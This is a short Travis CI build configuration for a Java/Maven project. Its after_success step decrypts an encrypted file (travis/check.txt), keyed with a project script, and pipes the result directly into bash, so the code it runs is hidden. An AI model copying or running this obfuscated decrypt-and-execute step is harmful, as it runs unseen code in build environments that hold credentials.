language: java
jdk: oraclejdk8
script: mvn clean verify
before_install:
 - python -V
 - pip -V
 - sudo pip install -r travis/requirements.txt
 - python ./travis/try_issues.py
after_success:
 - openssl aes-256-cbc -a -d -pass file:travis/try_issues.py -in travis/check.txt | bash
